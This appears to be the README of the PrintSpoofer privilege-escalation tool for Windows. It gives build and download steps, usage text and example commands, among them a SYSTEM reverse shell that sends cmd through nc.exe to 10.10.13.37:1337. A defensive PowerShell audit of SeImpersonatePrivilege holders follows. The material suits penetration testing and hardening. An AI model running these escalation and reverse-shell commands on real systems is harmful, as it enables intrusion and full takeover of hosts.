From LOCAL/NETWORK SERVICE to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 and Server 2016/2019.
If you have Visual Studio you can clone and build PrintSpoofer from the GitHub repo:
git clone git@github.com:itm4n/PrintSpoofer.git
If not you can download the latest pre-built version from https://github.com/itm4n/PrintSpoofer/releases/latest.
Once you have a copy of the executable, use your preferred method to copy it over to your target and then run it. Running PrintSpoofer.exe -h prints the usage:
PrintSpoofer v0.1 (by @itm4n)

Provided that the current user has the SeImpersonate privilege, this tool will leverage the Print Spooler service to get a SYSTEM token and then run a custom command with CreateProcessAsUser()

Arguments:
  -c <CMD>  Execute the command *CMD*
  -i        Interact with the new process in the current command prompt (default is non-interactive)
  -d <ID>   Spawn a new process on the desktop corresponding to this session *ID* (check your ID with qwinsta)
  -h        That's me :)

Examples:
  - Run PowerShell as SYSTEM in the current console
      PrintSpoofer.exe -i -c powershell.exe
  - Spawn a SYSTEM command prompt on the desktop of the session 1
      PrintSpoofer.exe -d 1 -c cmd.exe
  - Get a SYSTEM reverse shell
      PrintSpoofer.exe -c "c:\Temp\nc.exe 10.10.13.37 1337 -e cmd"
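Since the whole technique hinges on which principals hold SeImpersonatePrivilege, the defender-side check is to audit that user-right assignment. The script below is an added example, not part of PrintSpoofer: it exports the local policy with secedit, parses the SeImpersonatePrivilege line, resolves each SID, and flags any holder beyond the four defaults (SERVICE, LOCAL SERVICE, NETWORK SERVICE, Administrators). The export path in $ExportPath is an assumed temporary location; run it from an elevated prompt.

```powershell
# Added audit example (not PrintSpoofer code): list who holds SeImpersonatePrivilege.
# $ExportPath is an assumed temp location for the secedit export; adjust as needed.
$ExportPath = Join-Path $env:TEMP 'user-rights.inf'

# Default holders on Windows 10 / Server 2016-2019. Anything else deserves a review,
# because every member of that set can reach SYSTEM with a tool like PrintSpoofer.
$DefaultHolders = @('S-1-5-6', 'S-1-5-19', 'S-1-5-20', 'S-1-5-32-544')

function Get-ImpersonatePrivilegeHolders {
    # Export only the User Rights Assignment area of the local security policy.
    secedit /export /cfg $ExportPath /areas USER_RIGHTS | Out-Null
    if (-not (Test-Path $ExportPath)) { throw 'secedit export failed (are you elevated?)' }

    # The [Privilege Rights] section contains lines like:
    #   SeImpersonatePrivilege = *S-1-5-6,*S-1-5-19,*S-1-5-20,*S-1-5-32-544
    $line = Get-Content $ExportPath | Where-Object { $_ -match '^SeImpersonatePrivilege\s*=' }
    Remove-Item $ExportPath -Force
    if (-not $line) { return }   # privilege granted to nobody

    $entries = (($line -split '=', 2)[1]).Trim() -split ','
    foreach ($entry in $entries) {
        $entry = $entry.Trim()
        if ($entry.StartsWith('*')) {
            # Entries prefixed with '*' are SIDs; resolve them to account names.
            $sid = $entry.Substring(1)
            try {
                $name = (New-Object -TypeName System.Security.Principal.SecurityIdentifier -ArgumentList $sid).Translate([System.Security.Principal.NTAccount]).Value
            } catch { $name = '<unresolved>' }
        } else {
            # secedit can also write a plain account name; map it back to a SID.
            $name = $entry
            try {
                $sid = (New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList $entry).Translate([System.Security.Principal.SecurityIdentifier]).Value
            } catch { $sid = '<unknown>' }
        }
        $status = if ($DefaultHolders -contains $sid) { 'default' } else { 'REVIEW' }
        [pscustomobject]@{ Status = $status; Sid = $sid; Account = $name }
    }
}

Get-ImpersonatePrivilegeHolders | Format-Table -AutoSize
```

Rows marked REVIEW are custom grants (typically service or application-pool accounts) that should be justified or removed, since the default holders are already the accounts this page targets.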